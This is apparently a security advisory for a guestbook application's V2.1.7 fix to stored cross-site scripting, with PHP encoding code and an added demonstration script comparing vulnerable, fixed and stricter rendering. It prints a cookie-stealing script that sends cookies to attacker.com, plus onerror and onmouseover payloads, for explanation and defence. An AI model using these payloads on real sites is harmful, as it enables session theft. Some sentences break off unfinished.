Fix — Sr - Denied Guestbook V2.1.7
Vulnerability: stored cross-site scripting in guestbook entries. The name and message fields were written into the page without encoding, so a visitor could post an entry containing:

    <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>

When any user (including an admin) viewed the guestbook, the script ran in their browser and sent their session cookies to the attacker.
Fix (guestbook entry handling):

    $name = htmlspecialchars($_POST['name'], ENT_QUOTES, 'UTF-8');
    $message = strip_tags($_POST['message'], '<b><i>'); // Allow basic formatting only
    echo "<p>" . $name . "</p>"; // $name is already encoded above; encoding it again would turn & into &amp;amp;

Note that strip_tags() with an allowed-tag list keeps the attributes of the allowed tags, so a message such as <b onmouseover="...">text</b> passes through this filter unchanged. To close that gap the attributes must be removed as well, for example by encoding the whole message and then re-enabling only bare <b> and <i> tags.

File: admin/delete_entry.php

Additionally, an authenticated admin clicking a crafted link
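To make the effect of the V2.1.7 change concrete, the following is an added example and not code from the Sr - Denied Guestbook project. It renders constructed guestbook entries (including the attacker.com payload from the advisory) three ways: the pre-fix string concatenation, the published fix, and a stricter variant that is an assumption for illustration, not something the page says the project shipped, which encodes the message and re-enables only bare <b> and <i> tags.

```php
<?php
// Added example (not code from the Sr - Denied Guestbook project). Entry data
// is constructed inline; no database or HTTP request is involved.

// Constructed sample entries: one benign, one carrying the cookie-stealing
// payload from the advisory, one abusing an event-handler attribute.
$entries = [
    ['name' => 'Alice', 'message' => 'Nice <b>site</b>!'],
    ['name'    => 'Mallory',
     'message' => "<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>"],
    ['name'    => '"><img src=x onerror=alert(1)>',
     'message' => '<b onmouseover="alert(document.cookie)">hover me</b>'],
];

// Pre-2.1.7 behaviour: user input is concatenated straight into the page,
// so both the name and the message can inject markup and script.
function render_vulnerable(array $e): string {
    return "<p><strong>{$e['name']}</strong>: {$e['message']}</p>";
}

// V2.1.7 fix as published: encode the name, strip all but <b>/<i> from the
// message. strip_tags() removes the <script> tags but keeps the attributes of
// the allowed tags, so an onmouseover= on <b> survives.
function render_fixed(array $e): string {
    $name    = htmlspecialchars($e['name'], ENT_QUOTES, 'UTF-8');
    $message = strip_tags($e['message'], '<b><i>');
    return "<p><strong>$name</strong>: $message</p>";
}

// Stricter variant (assumption for illustration, not the project's code):
// encode the whole message, then turn only the exact sequences &lt;b&gt;,
// &lt;/b&gt;, &lt;i&gt;, &lt;/i&gt; back into tags. A tag carrying an
// attribute no longer matches the pattern and stays encoded.
function render_strict(array $e): string {
    $name    = htmlspecialchars($e['name'], ENT_QUOTES, 'UTF-8');
    $message = htmlspecialchars($e['message'], ENT_QUOTES, 'UTF-8');
    $message = preg_replace('#&lt;(/?)([bi])&gt;#', '<$1$2>', $message);
    return "<p><strong>$name</strong>: $message</p>";
}

foreach ($entries as $e) {
    echo "vulnerable: ", render_vulnerable($e), "\n";
    echo "fixed:      ", render_fixed($e), "\n";
    echo "strict:     ", render_strict($e), "\n\n";
}
```

Run it with `php example.php`. For the second entry the fixed output keeps the script body as inert text because strip_tags() removed the <script> tags; for the third entry the onmouseover attribute is still present in the fixed output but not in the strict one, which is the gap the published fix leaves open.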
After applying Sr - Denied Guestbook V2.1.7, the following tests were performed: